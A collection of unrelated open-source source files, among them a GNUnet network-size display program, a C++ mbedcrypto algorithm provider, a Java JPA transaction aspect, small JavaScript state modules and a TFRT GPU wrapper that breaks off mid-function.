WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with GNUnet; see the file COPYING. If not, write to the
Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1301, USA.
*/
/**
* @file nse/gnunet-nse.c
* @brief Program to display network size estimates from the NSE service
* @author <NAME> <<EMAIL>>
*/
#include "platform.h"
#include "gnunet_nse_service.h"
/**
* The handle to the NSE service
*/
static struct GNUNET_NSE_Handle *nse;
/**
* The program status; 0 for success.
*/
static int status;
/**
* Task to shutdown and clean up all state
*
* @param cls NULL
*/
static void
do_shutdown (void *cls)
{
if (NULL != nse)
{
GNUNET_NSE_disconnect (nse);
nse = NULL;
}
}
/**
* Callback to call when network size estimate is updated.
*
* @param cls NULL
* @param timestamp server timestamp
* @param estimate the value of the current network size estimate
* @param std_dev standard deviation (rounded down to nearest integer)
* of the size estimation values seen
*/
static void
handle_estimate (void *cls,
struct GNUNET_TIME_Absolute timestamp,
double estimate,
double std_dev)
{
status = 0;
FPRINTF (stdout, "%llu %f %f %f\n",
(unsigned long long) timestamp.abs_value_us,
GNUNET_NSE_log_estimate_to_n (estimate),
estimate,
std_dev);
}
/**
* Actual main function that runs the emulation.
*
* @param cls unused
* @param args remaining args, unused
* @param cfgfile name of the configuration
* @param cfg configuration handle
*/
static void
run (void *cls,
char *const *args,
const char *cfgfile,
const struct GNUNET_CONFIGURATION_Handle *cfg)
{
nse = GNUNET_NSE_connect (cfg,
&handle_estimate,
NULL);
GNUNET_SCHEDULER_add_shutdown (&do_shutdown,
NULL);
}
/**
* Main function.
*
* @return 0 on success
*/
int
main (int argc,
char *const *argv)
{
static struct GNUNET_GETOPT_CommandLineOption options[] = {
GNUNET_GETOPT_OPTION_END
};
status = 1;
if (GNUNET_OK !=
GNUNET_PROGRAM_run (argc,
argv,
"gnunet-nse",
gettext_noop
("Show network size estimates from NSE service."),
options,
&run, NULL))
return 2;
return status;
}
|
jc-lab/jcp
|
provider/mbedcrypto/src/mbedcrypto_provider.cpp
|
<filename>provider/mbedcrypto/src/mbedcrypto_provider.cpp
/**
* @file mbedcrypto_provider.cpp
* @author Jichan (<EMAIL> / http://ablog.jc-lab.net/ )
* @date 2019/07/19
* @copyright Copyright (C) 2019 jichan.\n
* This software may be modified and distributed under the terms
* of the Apache License 2.0. See the LICENSE file for details.
*/
#include <jcp/security.hpp>
#include "jcp/mbedcrypto_provider.hpp"
#include "jcp/cipher_algo.hpp"
#include "jcp/message_digest_algo.hpp"
#include "jcp/mac_algo.hpp"
#include "jcp/key_agreement_algo.hpp"
#include "jcp/signature_algo.hpp"
#include "jcp/secret_key_factory_algo.hpp"
#include "jcp/key_factory_algo.hpp"
#include "jcp/key_pair_algo.hpp"
#include "mbedcrypto_securerandom.hpp"
#include "mbedcrypto_cipher_sym.hpp"
#include "mbedcrypto_cipher_asym.hpp"
#include "mbedcrypto_md.hpp"
#include "mbedcrypto_ka_ecdh.hpp"
#include "mbedcrypto_sign.hpp"
#include "jcp/mbedcrypto_key_utils.hpp"
#include "mbedcrypto_key_factory.hpp"
#include "mbedcrypto_key_pair_generator.hpp"
#include <jcp/soft/soft_pbkdf2_skf.hpp>
#include <jcp/soft/soft_hkdf_skf.hpp>
#include <mbedtls/cipher.h>
namespace jcp {
void MbedcryptoProvider::registerTo(Security *security) {
jcp::Security::addProvider(std::make_unique<MbedcryptoProvider>());
}
MbedcryptoProvider::MbedcryptoProvider()
{
setSecureRandomFactory(std::make_unique<mbedcrypto::MbedcryptoSecureRandomFactory>(this));
setKeyUtils(std::make_unique<mbedcrypto::MbedcryptoKeyUtils>(this));
addCipherAlgorithm(&CipherAlgorithm::AesEcbNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_ECB},
{192, MBEDTLS_CIPHER_AES_192_ECB},
{256, MBEDTLS_CIPHER_AES_256_ECB}
})));
addCipherAlgorithm(&CipherAlgorithm::AesCbcNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_CBC},
{192, MBEDTLS_CIPHER_AES_192_CBC},
{256, MBEDTLS_CIPHER_AES_256_CBC}
})));
addCipherAlgorithm(&CipherAlgorithm::AesGcmNoPadding, std::unique_ptr<mbedcrypto::MbedcryptoSymCipherFactory>(new mbedcrypto::MbedcryptoSymCipherFactory(this, true, {
{128, MBEDTLS_CIPHER_AES_128_GCM},
{192, MBEDTLS_CIPHER_AES_192_GCM},
{256, MBEDTLS_CIPHER_AES_256_GCM}
})));
addCipherAlgorithm(&CipherAlgorithm::RsaEcbOaepPadding, std::make_unique<mbedcrypto::MbedcryptoAsymCipherFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_RSA_PKCS_V21));
mbedcrypto::MbedcryptoMessageDigestFactory* sha1Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA1);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_1, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha1Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha224Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA224);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_224, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha224Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha256Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA256);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_256, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha256Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha384Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA384);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_384, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha384Factory));
mbedcrypto::MbedcryptoMessageDigestFactory* sha512Factory = new mbedcrypto::MbedcryptoMessageDigestFactory(this, MBEDTLS_MD_SHA512);
addMessageDigestAlgorithm(&MessageDigestAlgorithm::SHA_512, std::unique_ptr<mbedcrypto::MbedcryptoMessageDigestFactory>(sha512Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha1Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA1);
addMacAlgorithm(&MacAlgorithm::HmacSHA1, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha1Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha224Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA224);
addMacAlgorithm(&MacAlgorithm::HmacSHA224, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha224Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha256Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA256);
addMacAlgorithm(&MacAlgorithm::HmacSHA256, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha256Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha384Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA384);
addMacAlgorithm(&MacAlgorithm::HmacSHA384, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha384Factory));
mbedcrypto::MbedcryptoMacFactory *hmacSha512Factory = new mbedcrypto::MbedcryptoMacFactory(this, MBEDTLS_MD_SHA512);
addMacAlgorithm(&MacAlgorithm::HmacSHA512, std::unique_ptr<mbedcrypto::MbedcryptoMacFactory>(hmacSha512Factory));
addKeyAgreementAlgorithm(&KeyAgreementAlgorithm::ECDH, std::make_unique<mbedcrypto::MbedcryptoKaEcdhFactory>(this));
addSignatureAlgorithm(&SignatureAlgorithm::NONEwithECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_NONE, nullptr));
addSignatureAlgorithm(&SignatureAlgorithm::SHA1withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA1, sha1Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA224withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA224, sha224Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA256withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA256, sha256Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA384withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA384, sha384Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA512withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_ECDSA, MBEDTLS_MD_SHA512, sha512Factory));
addSignatureAlgorithm(&SignatureAlgorithm::NONEwithRSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_NONE, nullptr));
addSignatureAlgorithm(&SignatureAlgorithm::SHA1withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA1, sha1Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA224withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA224, sha224Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA256withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA256, sha256Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA384withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA384, sha384Factory));
addSignatureAlgorithm(&SignatureAlgorithm::SHA512withECDSA, std::make_unique<mbedcrypto::MbedcryptoSignFactory>(this, MBEDTLS_PK_RSA, MBEDTLS_MD_SHA512, sha512Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA1, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha1Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA224, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha224Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA256, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha256Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA384, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha384Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::PBKDF2WithHmacSHA512, std::make_unique<soft::SoftPBKDF2SecretKeyFactory>(this, hmacSha512Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA1, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha1Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA224, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha224Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA256, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha256Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA384, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha384Factory));
addSecretKeyFactoryAlgorithm(&SecretKeyFactoryAlgorithm::HKDFWithSHA512, std::make_unique<soft::SoftHKDFSecretKeyFactory>(this, hmacSha512Factory));
addKeyFactoryAlgorithm(&KeyFactoryAlgorithm::Pkcs8PrivateKey, std::make_unique<mbedcrypto::MbedcryptoPKCS8KeyFactoryFactory>(this));
addKeyFactoryAlgorithm(&KeyFactoryAlgorithm::X509PublicKey, std::make_unique<mbedcrypto::MbedcryptoPKCS8KeyFactoryFactory>(this));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::RSA, std::make_unique<mbedcrypto::MbedcryptoRSAKeyPairGeneratorFactory>(this));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp192r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP192R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp192k1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP192K1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp256r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp256k1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256K1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_prime256v1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp384r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP384R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_secp521r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_SECP521R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp256r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP256R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp384r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP384R1));
addKeyPairGeneratorAlgorithm(&KeyPairAlgorithm::EC_bp512r1, std::make_unique<mbedcrypto::MbedcryptoECKeyPairGeneratorFactory>(this, MBEDTLS_ECP_DP_BP512R1));
}
} // namespace jcp
|
LesNovell/helix-parent
|
helix-jpa/src/main/java/io/helixservice/feature/jpa/transaction/TransactionalAspect.java
|
/*
* @author <NAME>
*
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
*/
package io.helixservice.feature.jpa.transaction;
import co.paralleluniverse.fibers.SuspendExecution;
import io.helixservice.feature.jpa.JpaHibernateFeature;
import org.aspectj.lang.ProceedingJoinPoint;
import org.aspectj.lang.Signature;
import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import javax.persistence.EntityTransaction;
import javax.persistence.PersistenceContext;
import javax.transaction.Transactional;
import java.lang.reflect.Field;
import java.util.EmptyStackException;
/**
* Aspects necessary to support @Transactional annotation
*/
@Aspect
public class TransactionalAspect {
private static Logger LOG = LoggerFactory.getLogger(TransactionalAspect.class);
public TransactionalAspect() {
}
/*
* Instruments all public methods with @Transactional annotation
*/
@SuppressWarnings("DuplicateThrows")
@Around(value = "(execution(public * *(..)) && @annotation(transactional))"
+ " || (execution(public * *(..)) && within(@javax.transaction.Transactional *) && @annotation(transactional))")
public Object around(ProceedingJoinPoint pjp, Transactional transactional) throws Throwable, SuspendExecution {
Object result;
Signature method = pjp.getSignature();
Object target = pjp.getTarget();
LOG.info("Managing transaction for method=" + method.getName() +
", target=" + target.getClass().getName() + ", txType=" + transactional.value());
validateTransactionalAnnotation(target, method, transactional);
boolean commit = false;
String persistenceContextName = beginTransaction(target);
try {
result = pjp.proceed();
commit = true;
} catch (Throwable t) {
commit = shouldCommitOnThrowable(transactional, t);
LOG.info("Caught throwable=" + t.getClass().getName() + ", which results in commit=" + commit);
throw t;
} finally {
LOG.trace("Skipping non-transactional method=" + method.getName() + ", target=" + target.getClass().getName());
endTransaction(persistenceContextName, commit);
}
return result;
}
private void validateTransactionalAnnotation(Object target, Signature method, Transactional transactional) {
if (transactional.value() != Transactional.TxType.REQUIRED) {
String msg = "Transaction type not supported: txType=" + transactional.value() + ", method=" + method.getName() + ", target=" + target
.getClass().getName();
LOG.error(msg);
throw new IllegalArgumentException(msg);
}
}
@SuppressWarnings("unchecked")
private boolean shouldCommitOnThrowable(Transactional transactional, Throwable t) {
Class[] dontRollbackClasses = transactional.dontRollbackOn();
for (Class dontRollbackClass : dontRollbackClasses) {
if (dontRollbackClass.isAssignableFrom(t.getClass())) {
return true;
}
}
Class[] rollbackClasses = transactional.rollbackOn();
for (Class rollbackClass : rollbackClasses) {
if (rollbackClass.isAssignableFrom(t.getClass())) {
return false;
}
}
return (RuntimeException.class.isAssignableFrom(t.getClass()));
}
private String beginTransaction(Object target) throws Throwable {
String persistenceUnitName;
try {
Field entityManagerField = findEntityManagerField(target);
persistenceUnitName = findPersistenceUnitName(target, entityManagerField);
LOG.info("Beginning transaction on " + persistenceUnitName);
EntityManager entityManager = createEntityManager(persistenceUnitName);
EntityManagerStack.push(persistenceUnitName, entityManager);
entityManagerField.set(target, new EntityManagerDelegate(persistenceUnitName));
} catch (Throwable t) {
String message = "Unable to begin transaction on entity manager in targetClass=" + target.getClass().getName();
LOG.error(message, t);
throw new IllegalStateException(message, t);
}
return persistenceUnitName;
}
private EntityManager createEntityManager(String persistenceUnitName) {
EntityManager entityManager;
if (EntityManagerStack.isEmpty(persistenceUnitName)) {
EntityManagerFactory entityManagerFactory = JpaHibernateFeature.entityManagerFactoryByPersistenceUnitName(persistenceUnitName);
entityManager = entityManagerFactory.createEntityManager();
LOG.info("Created entityManager=" + emIdentifier(entityManager) + " on threadName=" + Thread.currentThread().getName());
entityManager.getTransaction().begin();
LOG.info("Started transaction on entityManager=" + emIdentifier(entityManager));
} else {
entityManager = EntityManagerStack.peek(persistenceUnitName);
}
return entityManager;
}
private Field findEntityManagerField(Object target) throws IllegalAccessException {
Field result = null;
Class<?> targetClass = target.getClass();
for (Field field : targetClass.getDeclaredFields()) {
if (field.getType().equals(EntityManager.class)) {
field.setAccessible(true);
result = field;
}
}
if (result == null) {
String message = "EntityManager field missing on targetClass=" + targetClass.getName();
LOG.error(message);
throw new IllegalStateException(message);
}
return result;
}
private String findPersistenceUnitName(Object target, Field entityManagerField) {
String persistenceUnitName = JpaHibernateFeature.DEFAULT_PERSISTENCE_UNIT_NAME;
PersistenceContext persistenceContext = entityManagerField.getDeclaredAnnotation(PersistenceContext.class);
if (persistenceContext == null) {
persistenceContext = target.getClass().getAnnotation(PersistenceContext.class);
}
if (persistenceContext != null && persistenceContext.name() != null) {
persistenceUnitName = persistenceContext.unitName();
}
return persistenceUnitName;
}
private void endTransaction(String persistenceUnitName, boolean commit) {
LOG.info("Ending transaction on " + persistenceUnitName);
EntityManager entityManager;
try {
entityManager = EntityManagerStack.pop(persistenceUnitName);
} catch (EmptyStackException e) {
throw new IllegalStateException("endTransaction() failed => EntityManagerStack is empty", e);
}
if (EntityManagerStack.isEmpty(persistenceUnitName)) {
try {
if (commit && !entityManager.getTransaction().getRollbackOnly()) {
entityManager.getTransaction().commit();
LOG.info("Transaction committed on entityManager=" + emIdentifier(entityManager));
} else {
entityManager.getTransaction().rollback();
LOG.info("Transaction rolled back on entityManager=" + emIdentifier(entityManager));
}
} finally {
safelyCloseEntityManager(entityManager);
}
} else {
if (!commit) {
LOG.info("Transaction marked for rollback only on entityManager=" + emIdentifier(entityManager));
entityManager.getTransaction().setRollbackOnly();
}
}
}
private void safelyCloseEntityManager(EntityManager entityManager) {
try {
LOG.trace("Closing entityManager=" + emIdentifier(entityManager));
try {
EntityTransaction transaction = entityManager.getTransaction();
if (transaction != null && transaction.isActive()) {
transaction.rollback();
}
} finally {
entityManager.close();
}
} catch (Throwable unexpected) {
// Unexpected
LOG.error("Unexpected exception closing the entity manager", unexpected);
}
}
private String emIdentifier(EntityManager entityManager) {
return Integer.toHexString(entityManager.hashCode());
}
}
|
wkkisme/heroland-competition-parent
|
dao/src/main/java/com/heroland/competition/dal/mapper/HeroLandQuestionRecordDetailMapper.java
|
<gh_stars>0
package com.heroland.competition.dal.mapper;
import com.heroland.competition.dal.pojo.HeroLandQuestionRecordDetail;
import com.heroland.competition.dal.pojo.HeroLandQuestionRecordDetailExample;
import java.util.List;
import org.apache.ibatis.annotations.Param;
public interface HeroLandQuestionRecordDetailMapper {
long countByExample(HeroLandQuestionRecordDetailExample example);
int deleteByExample(HeroLandQuestionRecordDetailExample example);
int deleteByPrimaryKey(Long id);
int insert(HeroLandQuestionRecordDetail record);
int insertSelective(HeroLandQuestionRecordDetail record);
List<HeroLandQuestionRecordDetail> selectByExample(HeroLandQuestionRecordDetailExample example);
HeroLandQuestionRecordDetail selectByPrimaryKey(Long id);
int updateByExampleSelective(@Param("record") HeroLandQuestionRecordDetail record, @Param("example") HeroLandQuestionRecordDetailExample example);
int updateByExample(@Param("record") HeroLandQuestionRecordDetail record, @Param("example") HeroLandQuestionRecordDetailExample example);
int updateByPrimaryKeySelective(HeroLandQuestionRecordDetail record);
int updateByPrimaryKey(HeroLandQuestionRecordDetail record);
int countCorrectAnswer(@Param("topicId") String topicId, @Param("questionId") Long questionId, @Param("userId") String excludeUserId);
}
|
yuhualingfeng/docs-webpack
|
webpack3/src/redux/reducers1.js
|
<gh_stars>0
function setLeftMenuShowState(state=true,action) {
if(action.type == 'leftMenuShowState'){
return action.leftMenuShowState;
}
return state;
}
export default {
setLeftMenuShowState
}
|
MJaroslav/IHateGUI
|
api/src/main/java/com/github/mjaroslav/ihategui/api/model/TextSize.java
|
<reponame>MJaroslav/IHateGUI<filename>api/src/main/java/com/github/mjaroslav/ihategui/api/model/TextSize.java
package com.github.mjaroslav.ihategui.api.model;
import com.github.mjaroslav.ihategui.util.ParsingHelper;
import com.github.mjaroslav.ihategui.util.StringUtils;
import lombok.*;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
@EqualsAndHashCode
@ToString
@NoArgsConstructor(access = AccessLevel.PRIVATE)
public final class TextSize {
public static final int DEFAULT_SIZE = 10;
@NotNull
private Type type = Type.DEFAULT;
@NotNull
private String value = type.toString();
public boolean isDefault() {
return type == Type.DEFAULT;
}
public boolean isConstant() {
return type == Type.CONSTANT;
}
public boolean isPercent() {
return type == Type.PERCENT;
}
public int asConstant() {
return Integer.parseInt(value);
}
public float asPercent() {
return Float.parseFloat(StringUtils.sub(value, -1));
}
public void set(@NotNull String value) {
type = Type.of(value);
this.value = value;
}
@NotNull
public static TextSize of(@NotNull String value) {
val result = new TextSize();
result.set(value);
return result;
}
public enum Type {
DEFAULT, CONSTANT, PERCENT;
@NotNull
public static Type of(@Nullable String value) {
return ParsingHelper.parseTextAndNumericEnum(value, DEFAULT, CONSTANT, PERCENT, Type::valueOf);
}
}
}
|
maxpearl/hypha
|
hypha/static_src/src/app/src/common/containers/FormContainer/models.js
|
<reponame>maxpearl/hypha
import * as Immutable from 'seamless-immutable';
export const formInitialState = Immutable.from({
values: {},
errors: {},
constraints: {},
readyToSubmit: false
});
const initialState = Immutable.from({
forms: {}
});
export default initialState;
|
Dig-Doug/runtime
|
backends/gpu/lib/system/system.cc
|
<gh_stars>0
// Copyright 2021 The TensorFlow Runtime Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Implement a few thin wrapper for GPU APIs.
#include "tfrt/gpu/system/system.h"
#include "tfrt/bef_executor/bef_file.h"
#include "tfrt/gpu/gpu_types.h"
#include "tfrt/gpu/wrapper/wrapper.h"
#include "tfrt/host_context/async_dispatch.h"
#include "tfrt/host_context/async_value_ref.h"
#include "tfrt/host_context/chain.h"
#include "tfrt/host_context/diagnostic.h"
#include "tfrt/host_context/execution_context.h"
#include "tfrt/host_context/function.h"
#include "tfrt/host_context/host_context.h"
#include "tfrt/support/error_util.h"
namespace tfrt {
namespace gpu {
Program::Program(BefBuffer&& file_buffer, llvm::StringRef function_name,
HostContext* host)
: file_buffer_(std::move(file_buffer)) {
bef_file_ = tfrt::BEFFile::Open(file_buffer_, host->GetKernelRegistry(),
host->diag_handler(), host->allocator());
assert(bef_file_);
function_ = bef_file_->GetFunction(function_name);
}
/*static*/
AsyncValueRef<System> System::Initialize(wrapper::Platform platform,
llvm::StringRef prefix,
HostContext* host) {
if (auto error = wrapper::Init(platform))
return tfrt::MakeErrorAsyncValueRef(host, DecodedDiagnostic(error));
return Instantiate(host);
}
/*static*/
AsyncValueRef<System> System::Instantiate(HostContext* host) {
return MakeAvailableAsyncValueRef<System>(host, System{});
}
AsyncValueRef<GpuStream> System::CreateStream(ExecutionContext& exec_ctx,
int gpu_ordinal) {
// NOTE(fishx): Right now we create a new context for each GPU stream.
// TODO(tfrt-devs): Find a way to reuse the same context for multiple stream.
auto device = wrapper::DeviceGet(wrapper::Platform::CUDA, gpu_ordinal);
if (!device) {
return MakeErrorAsyncValueRef(exec_ctx.host(),
DecodedDiagnostic(device.takeError()));
}
auto context = wrapper::CtxCreate(wrapper::CtxFlags::SCHED_AUTO, *device);
if (!context) {
return MakeErrorAsyncValueRef(exec_ctx.host(),
DecodedDiagnostic(context.takeError()));
}
auto current = wrapper::CtxSetCurrent(context->get());
if (!current) {
return MakeErrorAsyncValueRef(exec_ctx.host(),
DecodedDiagnostic(current.takeError()));
}
auto stream =
wrapper::StreamCreate(*current, wrapper::StreamFlags::NON_BLOCKING);
if (!stream) {
return MakeErrorAsyncValueRef(exec_ctx.host(),
DecodedDiagnostic(stream.takeError()));
}
auto gpu_context = MakeAvailableAsyncValueRef<GpuContext>(
exec_ctx.host(), std::move(*context));
return tfrt::MakeAvailableAsyncValueRef<tfrt::gpu::GpuStream>(
exec_ctx.host(), std::move(gpu_context), std::move(*stream));
}
AsyncValueRef<GpuAllocator> System::CreateAllocator(
ExecutionContext& exec_ctx, AsyncValueRef<GpuStream> stream) {
return MakeAvailableAsyncValueRef<GpuDefaultAllocator>(exec_ctx.host(),
stream->gpu_context());
}
AsyncValueRef<GpuBuffer> System::Allocate(ExecutionContext& exec_ctx,
AsyncValueRef<GpuStream> stream,
AsyncValueRef<GpuAllocator> allocator,
size_t size) {
auto buffer = GpuBuffer::Allocate(std::move(allocator), size, stream->get());
if (!buffer) {
return MakeErrorAsyncValueRef(exec_ctx.host(),
DecodedDiagnostic(buffer.takeError()));
}
return MakeAvailableAsyncValueRef<GpuBuffer>(exec_ctx.host(),
std::move(*buffer));
}
AsyncValueRef<Chain> System::TransferToDevice(ExecutionContext& exec_ctx,
AsyncValueRef<GpuStream> stream,
AsyncValueRef<GpuBuffer> dst,
ArrayRef<uint8_t> src,
AsyncValueRef<Chain> chain) {
auto out_chain = MakeUnconstructedAsyncValueRef<Chain>(exec_ctx.host());
RunWhenReady({dst.GetAsyncValue(), chain.GetAsyncValue()},
[stream = std::move(stream), dst = std::move(dst), src,
chain = std::move(chain), out_chain = out_chain.CopyRef()] {
if (dst.IsError()) return out_chain.SetError(dst.GetError());
if (chain.IsError())
return out_chain.SetError(chain.GetError());
if (dst->size() < src.size()) {
return out_chain.SetError(tfrt::StrCat(
"TransferToDevice failed: "
"destination buffer size (",
dst->size(), ") is less than number of bytes to copy (",
src.size(), ")"));
}
auto current = wrapper::CtxSetCurrent(stream->context());
if (!current) return out_chain.SetError(current.takeError());
if (auto error = wrapper::MemcpyAsync(
*current, dst->pointer(),
wrapper::Pointer<const void>(
static_cast<const void*>(src.data()),
wrapper::Platform::CUDA),
src.size(), stream->get()))
return out_chain.SetError(error);
out_chain.emplace();
});
return out_chain;
}
AsyncValueRef<Chain> System::TransferFromDevice(ExecutionContext& exec_ctx,
AsyncValueRef<GpuStream> stream,
MutableArrayRef<uint8_t> dst,
AsyncValueRef<GpuBuffer> src,
AsyncValueRef<Chain> chain) {
auto out_chain = MakeUnconstructedAsyncValueRef<Chain>(exec_ctx.host());
RunWhenReady(
{src.GetAsyncValue(), chain.GetAsyncValue()},
[exec_ctx, stream = std::move(stream), dst = std::move(dst),
src = std::move(src), chain = std::move(chain),
out_chain = out_chain.CopyRef()] {
if (src.IsError()) return out_chain.SetError(src.GetError());
if (chain.IsError()) return out_chain.SetError(chain.GetError());
if (dst.size() < src->size()) {
return out_chain.SetError(tfrt::StrCat(
"TransferFromDevice failed: "
"destination buffer size (",
dst.size(), ") is less than number of bytes to copy (",
src->size(), ")"));
}
